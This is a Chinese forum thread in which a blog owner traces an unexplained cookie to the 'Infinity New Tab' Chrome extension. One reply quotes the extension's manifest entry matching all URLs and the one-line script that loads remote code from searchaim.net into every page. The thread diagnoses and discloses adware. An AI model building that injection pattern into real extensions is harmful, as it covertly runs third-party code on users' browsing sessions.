推荐书目 高性能网站建设进阶指南
High Performance Web Sites
Google Hacks: Tips & Tools for Finding and Using the World's Information
关于 Google SEO 最好的一本书
High Performance Web Sites Google Hacks: Tips & Tools for Finding and Using the World's Information 关于 Google SEO 最好的一本书 
这是一个创建于 3720 天前的主题,其中的信息可能已经有所发展或是发生改变。
如题。用 Ghost 搭建的网站,没有登录, chrome 发现 cookie 有 1 个。
打开看看,来自一个域名 searchaim.net 。但是我印象中貌似从未见过这个网站,页面上应该也没有引用这个 js 。
如下图:
这是被插的 js :
网站已启用 HTTPS ,重定向所有 HTTP ,启用 HSTS , ssllabs A+
坐标湘潭,运营商电信。系统是 OS X 10.11.3
刚刚在 Ubuntu 虚拟机上测试了,没有被加这个 JS ,但是 OS X 下有
求教……
第 1 条附言 2016 年 2 月 16 日
已解决,发现是Infinity 新标签页这个扩展以所谓的开发需要支持为由肆意插入广告。
该扩展已被我删除并举报。
 | 1 chemzqm 2016 年 月 16 日 你先在远程机器上 curl 下那个页面,排除被劫持的可能。 不过很可能是你用的某个主题的 js 加的,话说 ghost 的 makrdown 功能特别弱,大部分 gfm 扩展都没有,改起来比 wordpress 还要麻烦,因为要重启服务。 |
 | 2 fourstring OP @chemzqm 感谢回复。 由于 ubuntu 虚拟机下没有被插广告,我就在 OS X 上开了隐身,也没有广告,证实是扩展引起的。 然后我在 HTML 里找到了一个 iframe ,默认 display : none ,删除后发现这是一个开发者的话,说什么插件正在开发,需要我们的广告支持。 我一个个把扩展关掉再打开,发现插广告的是“ Infinity 新标签页”这个插件…… 个人对这种行为特别反感,即使插件开发需要支持,也没有权力在用户浏览页面上肆意插入广告,这和流氓无异。 Ghost 的 markdown 的确不怎么地,不过它还支持 gfm 的代码,算是个可以庆幸的事了…… |
 | 3 hxsf 2016 年 2 月 16 日 刚刚我也发现了,居然有人跟我一样。。。。 我是自己在写东西,调试的时候忽然发现 dom 里多了一堆 script 。。。 已经证实是由 Infinity New Tab 2.5.6.0 版加入 之前版本( 2.5.5.0 )没有 通过 chrome 扩展的接口在所有页面插入 myscript.js ``` "content_scripts": [ { "js": [ "js/myscript.js" ], "matches": [ "*://*/*" ] } ], ``` 内容为 ```js var script=document.createElement("script");script.async=!0,script.src="http://www.v2ex.com//searchaim.net/ca93d58f43.js",document.getElementsByTagName("body")[0].appendChild(script); ``` 剩下的其它 script 和 iframe 都通过 ca93d58f43.js 插进来的 这种被插入 js ,我都直接去~/Library/Application\ Support/Google/Chrome/Default/Extensions 里搜,一搜一个准。。。 最后,同举报 |
| 4 hxsf 2016 年 2 月 16 日 14 年见过这个玩意的作者发帖说自己做的无广告 然而现在。。。只能呵呵了。。。 |
| 5 fourstring OP @hxsf 在今天事件爆发之后,作者迅速又更新了 2.5.7 ,刚刚我下下来看了,已经把广告给去了 然并卵,这种态度,无论如何也不会再用 |
| 6 hxsf 2016 年 2 月 16 日 @fourstring 是的 |
 | 7 stackboom 2016 年 2 月 17 日 发现 @yangguang31466 在 v2 上发过贴,不知道是不是原作者。 Infinity 云备份挺好用的。。哎~ |
| 8 fourstring OP @stackboom 这个人貌似是作者 |
Select Language